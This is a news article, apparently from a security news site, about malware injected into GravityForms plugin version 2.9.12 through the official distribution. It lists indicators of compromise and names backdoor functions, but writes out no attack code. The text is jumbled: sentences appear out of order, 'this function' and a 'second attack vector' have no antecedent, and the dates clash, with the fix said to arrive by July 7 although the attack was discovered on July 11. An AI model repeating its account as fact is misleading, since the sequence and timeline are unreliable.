A sophisticated supply chain attack has compromised the official GravityForms WordPress plugin, allowing attackers to inject malicious code that enables remote code execution on affected websites. The attack, discovered on July 11, 2025, represents a significant security breach affecting one of WordPress’s most popular form-building plugins, with the malware being distributed directly through the official gravityforms.com domain. Organizations using GravityForms are advised to immediately update to version 2.9.13 or later, conduct thorough security scans of their WordPress installations, and monitor for any unauthorized administrator accounts or suspicious file modifications. A sophisticated supply chain attack compromised GravityForms version 2.9.12, injecting malware via the official plugin distribution. Security firms have identified several indicators of compromise, including suspicious IP addresses (185.193.89.19 and 193.160.101.6), malicious files (bookmark-canonical.php and block-caching.php), and the specific API token used by the backdoor system. This function collected extensive system information from infected sites, including WordPress version, active plugins, user counts, and server details, then transmitted this data to the attacker-controlled domain. The security breach was first identified by researchers at Patchstack, who received reports of suspicious HTTP requests to an unknown domain, gravityapi.org, originating from the GravityForms plugin. Initial investigations revealed that the compromised plugin version 2.9.12 contained malware that was being distributed through official channels, including manual downloads and composer installations. The second attack vector utilized a function called list_sections() that created a sophisticated backdoor system requiring a specific API token for access. The malware enabled remote code execution, data exfiltration, and persistent backdoor access using functions like update_entry_detail() and list_sections(). However, the attack appeared to have a limited window of opportunity, as RocketGenius, the developer of GravityForms, quickly responded to remove the malicious code from new downloads. The malicious domain was registered on July 8, 2025, just days before the attack was discovered, suggesting a carefully orchestrated campaign. While the full scope of the attack remains under investigation, preliminary assessments suggest the infection was not widespread, likely due to the short timeframe during which the malicious version was available. The company confirmed they were conducting a thorough investigation into the breach, and by July 7, 2025, they had released version 2.9.13 to ensure users could safely update without the backdoor present. The response from the malicious server contained base64-encoded payloads that were automatically saved to the infected site’s file system, creating persistent backdoors.
This Cyber News was published on cybersecuritynews.com. Publication date: Sat, 12 Jul 2025 17:25:13 +0000